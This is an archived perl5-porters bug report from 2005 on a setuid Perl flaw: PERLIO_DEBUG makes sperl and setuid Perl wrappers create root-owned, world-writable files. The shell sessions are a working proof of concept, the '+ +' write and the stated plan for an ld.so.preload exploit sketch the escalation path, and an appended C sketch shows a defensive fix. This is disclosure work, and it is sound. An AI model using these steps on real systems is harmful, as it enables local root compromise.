develooper Front page | perl.perl5.porters | Postings from January 2005

[perl #33990] setuid perl security issues

From: KF
Date: January 30, 2005 12:50
Subject: [perl #33990] setuid perl security issues
Message ID: rt-3.0.11-33990-106770.16.2437313715399@perl.org
# New Ticket Created by  "KF (Lists)" 
# Please include the string:  [perl #33990]
# in the subject line of all future correspondence about this issue. 
# <URL: https://rt.perl.org/rt3/Ticket/Display.html?id=33990 >


PERLIO_DEBUG
If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

./perlio.c:    
void
PerlIO_debug(const char *fmt, ...)
{
...
    if (!dbg) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
        else
            dbg = -1;
    }


If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.

else you can do the following either via sperl or via sperl:

sperl:
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper
/usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.
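
The report above shows PerlIO_debug() opening whatever path PERLIO_DEBUG names, with mode 0666, while the process runs setuid. The following C sketch is an added example, not code from the ticket or from Perl's source or its eventual fix. It shows one defensive pattern for that call site: ignore the variable whenever real and effective ids differ, and open the log conservatively otherwise. The names ids_differ and open_debug_log are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* True when the process holds privileges its invoker lacks (setuid/setgid). */
int ids_differ(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Hypothetical helper: open an environment-supplied debug log, or return -1. */
int open_debug_log(const char *path, int privileged)
{
    struct stat st;
    int fd;

    if (!path || !*path)
        return -1;              /* variable unset: logging stays a no-op */
    if (privileged)
        return -1;              /* invoker must not choose a file we create as euid */

    /* 0600 instead of 0666, and refuse a symlink as the final path component. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Only append to a regular file that we own. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    int priv = ids_differ(getuid(), geteuid(), getgid(), getegid());
    int fd = open_debug_log(getenv("PERLIO_DEBUG"), priv);

    printf("privileged=%d debug_fd=%d\n", priv, fd);
    if (fd >= 0)
        close(fd);
    return 0;
}
```

With this check in place, the two sessions shown in the report would leave /tmp/aaa and /tmp/oops2 uncreated, because both binaries run with an effective uid that differs from the caller's.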
